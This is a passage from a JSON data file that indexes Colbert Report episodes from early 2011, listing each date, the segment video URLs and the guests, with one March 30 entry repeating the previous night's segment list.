        "http://thecolbertreport.cc.com/videos/njlf77/sign-off---coma-cozy"
      ],
      "guest": "Cornel West"
    },
    {
      "date": "2011-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4e1xmn/intro---1-19-11",
        "http://thecolbertreport.cc.com/videos/0s8rfq/black-tie-dinner-for-hu-jintao",
        "http://thecolbertreport.cc.com/videos/nujiex/tip-wag---four-loko---horoscopes",
        "http://thecolbertreport.cc.com/videos/vb8d7c/shout-out---preston-pysh",
        "http://thecolbertreport.cc.com/videos/czmy3b/ron-reagan",
        "http://thecolbertreport.cc.com/videos/0ycmn7/sign-off---i-eat-america--and-so-can-you---recall"
      ],
      "guest": "Ron Reagan Jr."
    },
    {
      "date": "2011-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/091ydv/rush-limbaugh-speaks-chinese",
        "http://thecolbertreport.cc.com/videos/bq6mnl/state-budget-shortfalls---christine-todd-whitman",
        "http://thecolbertreport.cc.com/videos/c8u4qm/50th-anniversary-of-jfk-s-inaugural-address",
        "http://thecolbertreport.cc.com/videos/6pfgfg/chris-matthews",
        "http://thecolbertreport.cc.com/videos/jjup5d/sign-off---donald-pellview"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2011-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z2h5xs/intro---1-24-11",
        "http://thecolbertreport.cc.com/videos/ry0uh0/stephen-rejects-keith-olbermann-s-power",
        "http://thecolbertreport.cc.com/videos/e7bfej/the-word---coverage-of-denial",
        "http://thecolbertreport.cc.com/videos/mjnoqk/art-stephen-up-challenge---banksy",
        "http://thecolbertreport.cc.com/videos/rsyf0v/charlie-rose",
        "http://thecolbertreport.cc.com/videos/v0sh08/sign-off---keith-olbermug"
      ],
      "guest": "Charlie Rose"
    },
    {
      "date": "2011-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1mhey7/intro---1-25-11",
        "http://thecolbertreport.cc.com/videos/d21szi/the--battle-hymn-of-the-tiger-mother--controversy",
        "http://thecolbertreport.cc.com/videos/5198pt/threatdown---radical-muslim-snacks--flying-robot-drones---coked-up-vacuums",
        "http://thecolbertreport.cc.com/videos/ooebba/nazi-ometer",
        "http://thecolbertreport.cc.com/videos/2lr90o/amy-chua",
        "http://thecolbertreport.cc.com/videos/71c1bx/sign-off---stephen-welcomes-cody-price"
      ],
      "guest": "Amy Chua"
    },
    {
      "date": "2011-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99necf/anonymous-insider-author-speculation",
        "http://thecolbertreport.cc.com/videos/d2sy94/obama-s-state-of-the-union-address---michael-waldman",
        "http://thecolbertreport.cc.com/videos/za0351/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---curtis-oda",
        "http://thecolbertreport.cc.com/videos/wja66h/christine-yvette-lewis",
        "http://thecolbertreport.cc.com/videos/7znx6n/sign-off---man-handler---fork-phone"
      ],
      "guest": "Michael Waldman, Christine Yvette Lewis"
    },
    {
      "date": "2011-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fllqqg/intro---1-27-11",
        "http://thecolbertreport.cc.com/videos/959fok/candyquake",
        "http://thecolbertreport.cc.com/videos/bhf8jv/time-traveling-porn---daryl-bem",
        "http://thecolbertreport.cc.com/videos/uffqf8/gordita-supreme-court",
        "http://thecolbertreport.cc.com/videos/zgxlja/brian-greene",
        "http://thecolbertreport.cc.com/videos/nkbrns/sign-off---goodnight"
      ],
      "guest": "Dr. Daryl Bem, Brian Greene"
    },
    {
      "date": "2011-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2wwddt/intro---1-31-11",
        "http://thecolbertreport.cc.com/videos/uv1y3k/mubarak--mu-problems",
        "http://thecolbertreport.cc.com/videos/w70tw3/mubarak--mu-problems---samer-shehata",
        "http://thecolbertreport.cc.com/videos/35ink0/paul-offit",
        "http://thecolbertreport.cc.com/videos/ccilnn/sign-off---kim-jong-bear"
      ],
      "guest": "Samer Shehata, Dr. Paul Offit"
    },
    {
      "date": "2011-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wk9d57/hosni-mubarak-will-not-run-again",
        "http://thecolbertreport.cc.com/videos/ie8q6j/thought-for-food---nestle-corporation",
        "http://thecolbertreport.cc.com/videos/2ucxw7/thought-for-food---wyngz---wal-mart",
        "http://thecolbertreport.cc.com/videos/odeko3/wal-mart-collaborates-with-obama-administration---leslie-dach",
        "http://thecolbertreport.cc.com/videos/4shxg7/michael-lewis",
        "http://thecolbertreport.cc.com/videos/s7oggh/sign-off---digiorno-pizza---boneless-wyngz"
      ],
      "guest": "Leslie Dach, Michael Lewis"
    },
    {
      "date": "2011-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zdhdko/intro---2-2-11",
        "http://thecolbertreport.cc.com/videos/ct2jwf/bing-gets-served",
        "http://thecolbertreport.cc.com/videos/a4bw27/cairo-turns-into-the-jersey-shore",
        "http://thecolbertreport.cc.com/videos/q27618/crisis-in-egypt",
        "http://thecolbertreport.cc.com/videos/yjimo0/tip-wag---british-superman---big-flats-beer",
        "http://thecolbertreport.cc.com/videos/dme3nu/sean-dorrance-kelly",
        "http://thecolbertreport.cc.com/videos/n2upjg/sign-off---christiane-aman-purr---big-flats-beer"
      ],
      "guest": "Sean Kelly"
    },
    {
      "date": "2011-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nn8o94/intro---2-3-11",
        "http://thecolbertreport.cc.com/videos/lo20rh/crisis-in-egypt---anderson-cooper---bill-o-reilly",
        "http://thecolbertreport.cc.com/videos/vuogyk/sport-report---super-bowl-edition",
        "http://thecolbertreport.cc.com/videos/91t3tp/affirmative-reaction",
        "http://thecolbertreport.cc.com/videos/i5rwqs/jane-mcgonigal",
        "http://thecolbertreport.cc.com/videos/hffd6m/sign-off---newest-member-of-the-colbert-nation"
      ],
      "guest": "Jane McGonigal"
    },
    {
      "date": "2011-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kruhy0/intro---2-14-11",
        "http://thecolbertreport.cc.com/videos/4drnjr/mysteries-of-the-ancient-unknown---egyptian-coincidence",
        "http://thecolbertreport.cc.com/videos/gv0hvh/the-enemy-within---toddler-edition",
        "http://thecolbertreport.cc.com/videos/qtecuk/james-murphy-of-lcd-soundsystem",
        "http://thecolbertreport.cc.com/videos/4qawhf/sign-off---scoops-of-americone-dream"
      ],
      "guest": "LCD Soundsystem"
    },
    {
      "date": "2011-02-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ynf8rd/intro---2-15-11",
        "http://thecolbertreport.cc.com/videos/sjuyr9/italian-bunga-bunga-parties---egyptian-democracy",
        "http://thecolbertreport.cc.com/videos/ara6q6/egyptian-democracy---christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/n9a7wj/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---ron-gould",
        "http://thecolbertreport.cc.com/videos/uobmig/david-albright",
        "http://thecolbertreport.cc.com/videos/95itm9/sign-off---christiane-aman-purr-s-safari-suit"
      ],
      "guest": "Christiane Amanpour, David Albright"
    },
    {
      "date": "2011-02-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bbqm6g/intro---2-16-11",
        "http://thecolbertreport.cc.com/videos/bojft9/republican-voters-doubt-obama-s-american-citizenship",
        "http://thecolbertreport.cc.com/videos/uk8a3q/tip-wag---colbuffington-re-post--repo-games---whale-fail",
        "http://thecolbertreport.cc.com/videos/8r9j45/murdoch-he-wrote",
        "http://thecolbertreport.cc.com/videos/re8ih2/eric-foner",
        "http://thecolbertreport.cc.com/videos/i84xxd/sign-off---general-butterbean"
      ],
      "guest": "Eric Foner"
    },
    {
      "date": "2011-02-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/62enfw/the-huffington-post-posts-about-the-colbuffington-re-post",
        "http://thecolbertreport.cc.com/videos/yjsn8n/clarence-thomas-s-financial-disclosure-controversy",
        "http://thecolbertreport.cc.com/videos/tvwda6/project-magazine-cover-boy",
        "http://thecolbertreport.cc.com/videos/sjlg3t/jeffrey-leonard",
        "http://thecolbertreport.cc.com/videos/m0qkxm/sign-off---project-magazine-cover"
      ],
      "guest": "Jeffrey Leonard"
    },
    {
      "date": "2011-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/86hqgf/turmoil-in-the-middle-east---turmoil-in-the-middle-west",
        "http://thecolbertreport.cc.com/videos/lp0v0e/cheating-death---ablibalify---bing-bongavax",
        "http://thecolbertreport.cc.com/videos/fwkicl/rick-santorum-internet-search",
        "http://thecolbertreport.cc.com/videos/8du0y6/eugene-jarecki",
        "http://thecolbertreport.cc.com/videos/58iq33/sign-off---goodnight"
      ],
      "guest": "Eugene Jarecki"
    },
    {
      "date": "2011-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bqnw4a/intro---2-22-11",
        "http://thecolbertreport.cc.com/videos/bm2a1j/a-less-perfect-union",
        "http://thecolbertreport.cc.com/videos/usnwve/a-less-perfect-union---randi-weingarten",
        "http://thecolbertreport.cc.com/videos/f6avpd/wisco-inferno---jon-erpenbach",
        "http://thecolbertreport.cc.com/videos/p92sec/bing-west",
        "http://thecolbertreport.cc.com/videos/2kp9tj/sign-off---democrat-call"
      ],
      "guest": "Randi Weingarten, Bing West"
    },
    {
      "date": "2011-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pd1kio/intro---2-23-11",
        "http://thecolbertreport.cc.com/videos/883h13/usa-today-infographic-sells-out",
        "http://thecolbertreport.cc.com/videos/fn2n7y/bust-in-show",
        "http://thecolbertreport.cc.com/videos/tnaq8e/nailed--em---mark-burdett",
        "http://thecolbertreport.cc.com/videos/iap6wk/stephanie-coontz",
        "http://thecolbertreport.cc.com/videos/uyxtz0/sign-off---rebroadcasts"
      ],
      "guest": "Stephanie Coontz"
    },
    {
      "date": "2011-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7a9kp1/era-of-american-dental-exceptionalism-is-over",
        "http://thecolbertreport.cc.com/videos/xjtazd/corporate-hacker-tries-to-take-down-wikileaks",
        "http://thecolbertreport.cc.com/videos/8jruu4/corporate-hacker-tries-to-take-down-wikileaks---glenn-greenwald",
        "http://thecolbertreport.cc.com/videos/tyiacl/republicans-flirt-with-presidential-candidacy",
        "http://thecolbertreport.cc.com/videos/hxtqey/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/6ahql2/sign-off---elephant-beat"
      ],
      "guest": "Glenn Greenwald, Mike Huckabee"
    },
    {
      "date": "2011-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8jxxuv/intro---2-28-11",
        "http://thecolbertreport.cc.com/videos/8fpe6c/anonymous-hacks-the-colbert-report",
        "http://thecolbertreport.cc.com/videos/ohhby5/tip-wag---joe-reed---levi-s-ex-girlfriend-jeans",
        "http://thecolbertreport.cc.com/videos/lrah7j/art-stephen-up-challenge---phillips-de-pury-auction",
        "http://thecolbertreport.cc.com/videos/4oq5za/michael-scheuer",
        "http://thecolbertreport.cc.com/videos/qg45nm/sign-off---tomorrow-s-goodnight-preview"
      ],
      "guest": "Michael Scheuer"
    },
    {
      "date": "2011-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dbc523/intro---3-1-11",
        "http://thecolbertreport.cc.com/videos/hl74h7/muammar-al-gaddafi-competes-with-charlie-sheen",
        "http://thecolbertreport.cc.com/videos/ce6ez1/the-word---new-country-for-old-men",
        "http://thecolbertreport.cc.com/videos/6zdcls/senior-moment---geriatric-porn",
        "http://thecolbertreport.cc.com/videos/zxzpiz/evan-osnos",
        "http://thecolbertreport.cc.com/videos/b6gm2j/sign-off---welcome-zachary-paul-dahm"
      ],
      "guest": "Evan Osnos"
    },
    {
      "date": "2011-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/44fqvj/intro---3-2-11",
        "http://thecolbertreport.cc.com/videos/jh2tli/wisconsin-prank-call-bill",
        "http://thecolbertreport.cc.com/videos/i9x3xr/the-word---economic-boom",
        "http://thecolbertreport.cc.com/videos/uz0ktw/eulogy-spot",
        "http://thecolbertreport.cc.com/videos/7lrvtf/harry-connick-jr-",
        "http://thecolbertreport.cc.com/videos/ninj2e/sign-off---demise-of-the-white-pages"
      ],
      "guest": "Harry Connick Jr."
    },
    {
      "date": "2011-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nb3zpi/fox-news-suspends-contributors",
        "http://thecolbertreport.cc.com/videos/7vwzpc/ice-cream-fight-with-jimmy-fallon",
        "http://thecolbertreport.cc.com/videos/4oi0dh/ice-cream-hallucination-with-jimmy-fallon",
        "http://thecolbertreport.cc.com/videos/zxu7kb/mark-moffett",
        "http://thecolbertreport.cc.com/videos/2x8ter/sign-off---late-night-snack"
      ],
      "guest": "Mark W. Moffett"
    },
    {
      "date": "2011-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/432mwn/intro---3-7-11",
        "http://thecolbertreport.cc.com/videos/dmu7rh/stephen-wants-an-ipad-2",
        "http://thecolbertreport.cc.com/videos/zql2lp/on-notice---mike-huckabee",
        "http://thecolbertreport.cc.com/videos/mrhaui/america-s-next-gop-model",
        "http://thecolbertreport.cc.com/videos/ux0w7b/joshua-foer",
        "http://thecolbertreport.cc.com/videos/un3kdu/art-stephen-up-challenge---bid-on-stephen-s-portrait"
      ],
      "guest": "Joshua Foer"
    },
    {
      "date": "2011-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2s9pic/happy-mardi-gras---international-women-s-day",
        "http://thecolbertreport.cc.com/videos/29cv4a/light-bulb-ban",
        "http://thecolbertreport.cc.com/videos/yuo5to/light-bulb-ban---dale-bryk",
        "http://thecolbertreport.cc.com/videos/2nv2ie/charlie-sheen---fake-rahm-emanuel-on-twitter",
        "http://thecolbertreport.cc.com/videos/dqh7vp/dan-sinker",
        "http://thecolbertreport.cc.com/videos/wjd0wx/sign-off---welcome-zoe-simone-sanchez"
      ],
      "guest": "Dan Sinker"
    },
    {
      "date": "2011-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oivxm4/intro---3-9-11",
        "http://thecolbertreport.cc.com/videos/durtx6/stephen-gives-up-catholicism-for-lent",
        "http://thecolbertreport.cc.com/videos/c3zm6w/bench-press",
        "http://thecolbertreport.cc.com/videos/qi1r7y/bench-press---anthony-weiner",
        "http://thecolbertreport.cc.com/videos/mbmsxi/david-brooks",
        "http://thecolbertreport.cc.com/videos/bh348l/sign-off---jewish-stephen"
      ],
      "guest": "David Brooks"
    },
    {
      "date": "2011-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/au4itm/intro---3-10-11",
        "http://thecolbertreport.cc.com/videos/w8nzdj/newt-gingrich-wants-to-screw-america",
        "http://thecolbertreport.cc.com/videos/hagj8b/colbert-pac-ad",
        "http://thecolbertreport.cc.com/videos/k698u1/peter-king-understands-violent-radicalism",
        "http://thecolbertreport.cc.com/videos/84jg83/reza-aslan",
        "http://thecolbertreport.cc.com/videos/x9iaae/sign-off---enjoy-the-moment"
      ],
      "guest": "Reza Aslan"
    },
    {
      "date": "2011-03-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tkzzdn/intro---3-21-11",
        "http://thecolbertreport.cc.com/videos/btot11/crisis-in-the-middle-everywhere---japan---libya",
        "http://thecolbertreport.cc.com/videos/kvj8rv/raging-art-on---art-1",
        "http://thecolbertreport.cc.com/videos/9m4lpg/sign-off---dueling-banjos"
      ],
      "guest": "Steve Martin and the Steep Canyon Rangers"
    },
    {
      "date": "2011-03-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/67fxmc/intro---3-22-11",
        "http://thecolbertreport.cc.com/videos/4k1vs5/californians-respond-to-japanese-disaster",
        "http://thecolbertreport.cc.com/videos/tadiop/raging-art-on---art-2",
        "http://thecolbertreport.cc.com/videos/7fv2d8/crisis-in-the-middle-everywhere---cnn-and-fox-news-fight-in-libya",
        "http://thecolbertreport.cc.com/videos/iky4d9/ayman-mohyeldin",
        "http://thecolbertreport.cc.com/videos/f8fwxt/sign-off---goodnight"
      ],
      "guest": "Ayman Mohyeldin"
    },
    {
      "date": "2011-03-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m2qxvd/top-news-stories-all-at-once",
        "http://thecolbertreport.cc.com/videos/3rhe0w/raging-art-on---art-3",
        "http://thecolbertreport.cc.com/videos/3ccbj2/the-word---over-reactor",
        "http://thecolbertreport.cc.com/videos/wd1pjd/nathan-myhrvold",
        "http://thecolbertreport.cc.com/videos/l5f2yi/sign-off---pistachio-ice-cream"
      ],
      "guest": "Nathan Myhrvold"
    },
    {
      "date": "2011-03-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/awwa6r/intro---3-24-11",
        "http://thecolbertreport.cc.com/videos/o0idw2/bears---balls---misery-edition",
        "http://thecolbertreport.cc.com/videos/pst3ox/eat--pray-to-eat---laurie-garrett",
        "http://thecolbertreport.cc.com/videos/strtop/channeled-rage",
        "http://thecolbertreport.cc.com/videos/rfce7l/jody-williams",
        "http://thecolbertreport.cc.com/videos/3z7nhm/sign-off---john-oliver-s-new-york-stand-up-show"
      ],
      "guest": "Jody Williams"
    },
    {
      "date": "2011-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2u3wdk/intro---3-28-11",
        "http://thecolbertreport.cc.com/videos/vou6it/shout-out-to-cece-lederer",
        "http://thecolbertreport.cc.com/videos/xeu06g/chaos-in-chaonada",
        "http://thecolbertreport.cc.com/videos/s3xgtv/tip-wag---cigarette-tax--abortion-waiting-period---bargain-travelers",
        "http://thecolbertreport.cc.com/videos/c06ht5/maine-squeeze",
        "http://thecolbertreport.cc.com/videos/2p412b/michael-moore",
        "http://thecolbertreport.cc.com/videos/lplrhl/sign-off---movits--streams--out-of-my-head-"
      ],
      "guest": "Michael Moore"
    },
    {
      "date": "2011-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xysvku/intro---3-29-11",
        "http://thecolbertreport.cc.com/videos/wtajtw/turd-sandwich-in-libya",
        "http://thecolbertreport.cc.com/videos/fkwv1e/yahweh-or-no-way---christianity-is-fattening",
        "http://thecolbertreport.cc.com/videos/oa9b4m/stephen-s-next-religion---stephen-prothero",
        "http://thecolbertreport.cc.com/videos/730dpm/jimmy-fallon-promises-a-performance-by-stephen",
        "http://thecolbertreport.cc.com/videos/7m3guo/anthony-fauci",
        "http://thecolbertreport.cc.com/videos/ms1yr8/sign-off---do-not-help-jimmy-fallon"
      ],
      "guest": "Dr. Anthony Fauci"
    },
    {
      "date": "2011-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6nwkpk/exclusive---reporter-gets-nailed-by-san-francisco-cop",
        "http://thecolbertreport.cc.com/videos/xysvku/intro---3-29-11",
        "http://thecolbertreport.cc.com/videos/wtajtw/turd-sandwich-in-libya",
        "http://thecolbertreport.cc.com/videos/fkwv1e/yahweh-or-no-way---christianity-is-fattening",
        "http://thecolbertreport.cc.com/videos/oa9b4m/stephen-s-next-religion---stephen-prothero",
        "http://thecolbertreport.cc.com/videos/730dpm/jimmy-fallon-promises-a-performance-by-stephen",
        "http://thecolbertreport.cc.com/videos/7m3guo/anthony-fauci",
        "http://thecolbertreport.cc.com/videos/ms1yr8/sign-off---do-not-help-jimmy-fallon"
      ],
      "guest": "Tim Shriver"
    },
    {
      "date": "2011-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zxtidm/james-o-keefe-asks-for-donations",
        "http://thecolbertreport.cc.com/videos/8stgre/colbert-pac",
        "http://thecolbertreport.cc.com/videos/dtl1ew/colbert-pac---trevor-potter",
        "http://thecolbertreport.cc.com/videos/i3lpcq/stephen-practices-rebecca-black-s--friday-",
        "http://thecolbertreport.cc.com/videos/wug1p5/tim-shriver",
        "http://thecolbertreport.cc.com/videos/dwx5m0/sign-off---goodnight"
      ],
      "guest": "Tim Shriver"
    },
    {
      "date": "2011-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6ko78/intro---3-31-11",
        "http://thecolbertreport.cc.com/videos/oth30j/congressional-budget-menorah",
        "http://thecolbertreport.cc.com/videos/j56fvd/madison-as-hell",
        "http://thecolbertreport.cc.com/videos/o6su04/piers-gibbon",
        "http://thecolbertreport.cc.com/videos/gq7wfn/sign-off---congressional-budget-menorah-fire"
      ],
      "guest": "Piers Gibbon"
    },
    {
      "date": "2011-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nknyci/government-shutdown-menorah",
        "http://thecolbertreport.cc.com/videos/8fsxhp/stephen-shows-off-the-ipad-2",
        "http://thecolbertreport.cc.com/videos/953smc/the-word---that-new-smell-smell",
        "http://thecolbertreport.cc.com/videos/zr09m5/the-glennpocalypse",
        "http://thecolbertreport.cc.com/videos/j7j5ds/andrew-chaikin",
        "http://thecolbertreport.cc.com/videos/9h7n61/sign-off---inescapables"
      ],
      "guest": "Andrew Chaikin"
    },
    {
      "date": "2011-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x139me/tim-pawlenty-appeals-to-youth-vote",
        "http://thecolbertreport.cc.com/videos/dq1pyh/renaissance-nemesis---frank-jameso",
        "http://thecolbertreport.cc.com/videos/zw8gjf/james-franco-pt--1",
        "http://thecolbertreport.cc.com/videos/91jml7/james-franco-pt--2",
        "http://thecolbertreport.cc.com/videos/upimil/sign-off---frank-jameso"
      ],
      "guest": "James Franco"
    },
    {
      "date": "2011-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1fi1u8/wisconsin-supreme-court-race",
        "http://thecolbertreport.cc.com/videos/vu85n8/my-fair-colbert---hugo-vickers-pt--1",
        "http://thecolbertreport.cc.com/videos/53yz6p/wd-40-1",
        "http://thecolbertreport.cc.com/videos/q5s3lh/sir-david-tang",
        "http://thecolbertreport.cc.com/videos/oqhpiw/sign-off---wd-40-1-cleaner"
      ],
      "guest": "Sir David Tang"
    },
    {
      "date": "2011-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x9mvny/exclusive---my-fair-colbert---charming-prince-philip",
        "http://thecolbertreport.cc.com/videos/ruv6gp/exclusive---my-fair-colbert---ghost-of-an-irishman",
        "http://thecolbertreport.cc.com/videos/k0xu9f/intro---4-7-11",
        "http://thecolbertreport.cc.com/videos/a3oo5c/the-koran-s-best-day-ever",
        "http://thecolbertreport.cc.com/videos/uepxed/my-fair-colbert---hugo-vickers-pt--2",
        "http://thecolbertreport.cc.com/videos/4zz0jd/my-fair-colbert---hugo-vickers-pt--3",
        "http://thecolbertreport.cc.com/videos/hv2afg/jeff-greenfield",
        "http://thecolbertreport.cc.com/videos/b9aslx/sign-off---goodnight"
      ],
      "guest": "Jeff Greenfield"
    },
    {
      "date": "2011-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5p5wwd/countdown-to-government-shutdown",
        "http://thecolbertreport.cc.com/videos/wueypc/pap-smears-at-walgreens",
        "http://thecolbertreport.cc.com/videos/5o6455/thought-for-food---chocolate-air--denny-s---bacon-cologne",
        "http://thecolbertreport.cc.com/videos/5ej465/jamie-hyneman---adam-savage",
        "http://thecolbertreport.cc.com/videos/sse1uc/sign-off---champagne-flute-of-lead-paint"
      ],
      "guest": "Jamie Hyneman & Adam Savage"
    },
    {
      "date": "2011-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hvb9sp/intro---4-12-11",
        "http://thecolbertreport.cc.com/videos/ez4az7/jon-kyl-tweets-not-intended-to-be-factual-statements",
        "http://thecolbertreport.cc.com/videos/xcin15/mitt-happens",
        "http://thecolbertreport.cc.com/videos/l039ce/mitt-happens---rick-brookhiser",
        "http://thecolbertreport.cc.com/videos/pqpkrr/threat-level--rainbow",
        "http://thecolbertreport.cc.com/videos/2gpjkk/ray-kurzweil",
        "http://thecolbertreport.cc.com/videos/ry2cgl/sign-off---goodnight"
      ],
      "guest": "Ray Kurzweil"
    },
    {
      "date": "2011-04-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tjsqfs/tim-pawlenty-declares-candidacy-before-he-s-ready",
        "http://thecolbertreport.cc.com/videos/ha4gop/the-word---buy-and-cellulite",
        "http://thecolbertreport.cc.com/videos/jc9fbz/the-enemy-within---unicyclists",
        "http://thecolbertreport.cc.com/videos/nm38xu/morgan-spurlock",
        "http://thecolbertreport.cc.com/videos/l1ikyh/sign-off---doritos-suit"
      ],
      "guest": "Morgan Spurlock"
    },
    {
      "date": "2011-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fziyvf/obama-needs-charts-and-graphs",
        "http://thecolbertreport.cc.com/videos/pfzzi1/viacom-ruins-stephen-s-pac-dream",
        "http://thecolbertreport.cc.com/videos/yzb7q2/colbert-super-pac---trevor-potter",
        "http://thecolbertreport.cc.com/videos/k099cq/easter-under-attack---egg-edition",
        "http://thecolbertreport.cc.com/videos/iybrlk/caroline-kennedy",
        "http://thecolbertreport.cc.com/videos/rjwyn0/sign-off---ipad"
      ],
      "guest": "Caroline Kennedy"
    },
    {
      "date": "2011-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/00rg0h/catholic-bender",
        "http://thecolbertreport.cc.com/videos/tml3zz/obama-s-tax-return---road-to-the-trump-house",
        "http://thecolbertreport.cc.com/videos/e943tp/cheating-death---vaxa-international--lap-band-surgery---restless-leg-syndrome",
        "http://thecolbertreport.cc.com/videos/nxhrou/ron-paul",
        "http://thecolbertreport.cc.com/videos/8813vl/sign-off---vacsa-not-masturbating"
      ],
      "guest": "Rep. Ron Paul"
    },
    {
      "date": "2011-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hl20qf/intro---4-26-11",
        "http://thecolbertreport.cc.com/videos/zv4zje/mitt-romney-s--peacetime--gaffe",
        "http://thecolbertreport.cc.com/videos/rmltni/charles-manson-believes-in-global-warming",
        "http://thecolbertreport.cc.com/videos/i3gdyb/a-c--grayling",
        "http://thecolbertreport.cc.com/videos/qxdqyc/sign-off---taser"
      ],
      "guest": "A.C. Grayling"
    },
    {
      "date": "2011-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d9mieg/intro---4-27-11",
        "http://thecolbertreport.cc.com/videos/cnt2qq/america-needs-to-see-obama-s-report-cards",
        "http://thecolbertreport.cc.com/videos/vog079/tip-wag---faa--casio-watches---postal-service",
        "http://thecolbertreport.cc.com/videos/qu6i2l/anderson-cooper-goes-on-the-absurd-u-chart",
        "http://thecolbertreport.cc.com/videos/okt7ac/ice-t",
        "http://thecolbertreport.cc.com/videos/bi5bau/sign-off---goodnight-in-spanish"
      ],
      "guest": "Ice-T"
    },
    {
      "date": "2011-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xcnvxf/intro---4-28-11",
        "http://thecolbertreport.cc.com/videos/6ei496/stephen-waits-for-his-royal-wedding-invitation-in-london",
        "http://thecolbertreport.cc.com/videos/8ureil/progressives-united---russ-feingold",
        "http://thecolbertreport.cc.com/videos/dfmioz/homeland-security-eliminates-color-coded-terror-alert-system",
        "http://thecolbertreport.cc.com/videos/r7zj9a/wade-graham",
        "http://thecolbertreport.cc.com/videos/tsom8o/sign-off---off-to-the-royal-wedding"
      ],
      "guest": "Wade Graham"
    },
    {
      "date": "2011-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/792my5/intro---5-2-11",
        "http://thecolbertreport.cc.com/videos/6kw3l1/long-awaited--we-got-bin-laden--party",
        "http://thecolbertreport.cc.com/videos/501cxj/carefree-pre-9-11-world",
        "http://thecolbertreport.cc.com/videos/w147rj/relations-with-pakistan---richard-haass",
        "http://thecolbertreport.cc.com/videos/x03tm5/francis-fukuyama",
        "http://thecolbertreport.cc.com/videos/s3o1z2/sign-off---obama-s-timer-runs-out"
      ],
      "guest": "Francis Fukuyama"
    },
    {
      "date": "2011-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v58m27/intro---5-3-11",
        "http://thecolbertreport.cc.com/videos/h9f07a/osama-bin-laden-is-still-dead",
        "http://thecolbertreport.cc.com/videos/5n9zp7/obama-takes-credit-for-bin-laden-s-assassination",
        "http://thecolbertreport.cc.com/videos/h1wdo9/journalistic-grintegrity",
        "http://thecolbertreport.cc.com/videos/u2r1n6/rex-ryan",
        "http://thecolbertreport.cc.com/videos/ukrfvl/sign-off---special-kiss"
      ],
      "guest": "Rex Ryan"
    },
    {
      "date": "2011-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/edkk4q/intro---5-4-11",
        "http://thecolbertreport.cc.com/videos/ndiuxr/terrorists--they-re-just-like-us-",
        "http://thecolbertreport.cc.com/videos/kbkvj6/stephen-searches-for-shared-bathroom-key",
        "http://thecolbertreport.cc.com/videos/kt1w5q/movies-that-are-destroying-america---saving-america-edition",
        "http://thecolbertreport.cc.com/videos/50b5cb/amy-farrell",
        "http://thecolbertreport.cc.com/videos/jcmie8/sign-off---goodnight"
      ],
      "guest": "Amy Farrell"
    },
    {
      "date": "2011-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lbrn85/stephen-confesses-to-a-distracted-media",
        "http://thecolbertreport.cc.com/videos/avpz0y/threatdown---superman--madden-nfl-12----glee-",
        "http://thecolbertreport.cc.com/videos/g2bhyr/inaugural-republican-presidential-debate---donald-trump-s-wisdom",
        "http://thecolbertreport.cc.com/videos/4neb1g/bill-james",
        "http://thecolbertreport.cc.com/videos/k2or8w/sign-off---dennis-kucinich-heat-vision"
      ],
      "guest": "Bill James"
    },
    {
      "date": "2011-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dkbe7y/intro---5-9-11",
        "http://thecolbertreport.cc.com/videos/6rdbxz/hasidic-newspaper-removes-hillary-clinton",
        "http://thecolbertreport.cc.com/videos/mqyr6k/herman-cain-wins-the-first-republican-presidential-debate",
